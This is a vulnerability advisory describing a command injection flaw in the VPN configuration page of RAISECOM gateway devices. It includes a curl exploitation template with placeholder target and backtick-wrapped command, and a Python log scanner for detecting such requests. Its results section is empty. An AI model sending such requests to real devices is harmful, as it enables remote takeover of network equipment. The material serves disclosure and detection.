Overview

A command injection vulnerability has been identified in RAISECOM Gateway devices, affecting models MSG1200, MSG2100E, MSG2200, and MSG2300. It allows remote attackers to execute arbitrary commands on the system via the web interface. The issue resides in the list_base_config.php script, specifically in its handling of the template parameter, and affects over 25,112 devices on the Internet.


Affected Devices

Hardware

Software

Affected Components

URI: /vpn/list_base_config.php

Description: list_base_config.php is a component of the web-based interface of RAISECOM Gateway devices, used for managing VPN configurations. The vulnerability arises from improper handling of the template parameter in this script: because the input is insufficiently sanitized, the parameter can be used to execute arbitrary commands on the device's operating system.

CWE

CWE-77: Command Injection

Exploitation

Here is an example of how the vulnerability can be exploited using a curl command:

curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \
  -H 'Accept: */*' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Connection: keep-alive'

In this example, the curl command sends a malicious HTTP GET request to the list_base_config.php script. The request carries the command in the template parameter, wrapped in backticks, so that it is executed on the device.
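For defenders, requests of the shape described above can be found in web or proxy access logs. The following detection sketch is an added example, not part of the original advisory or any RAISECOM code; it assumes combined-format access logs and assumes legitimate template values contain only letters, digits, underscore, dot, and hyphen. The log lines are constructed, and CMD is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/vpn/list_base_config.php"
# Assumption: a legitimate template value is a plain name. Anything outside
# this allowlist (backticks, $, ;, |, spaces, ...) is reported.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.\-]*")
# Request line inside an access-log entry: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_template(log_line):
    """Return the decoded template value if the request looks like an
    injection attempt against the vulnerable script, else None."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != VULN_PATH:
        return None
    # parse_qs percent-decodes, so %60 and a literal backtick compare alike.
    for value in parse_qs(url.query, keep_blank_values=True).get("template", []):
        if not SAFE_VALUE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_template(line)) is not None]

# Constructed sample log lines (documentation IP range, placeholder command).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /vpn/list_base_config.php'
    '?type=mod&parts=base_config&template=default HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /vpn/list_base_config.php'
    '?type=mod&parts=base_config&template=%60CMD%60 HTTP/1.1" 200 0',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /vpn/list_base_config.php'
    '?type=mod&parts=base_config&template=`CMD` HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php'
    '?template=%60CMD%60 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious template value {v!r}")
```

Only the request line is inspected, so parameters sent in a POST body will not appear unless the log source records them.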

Actual Result

Sample 1
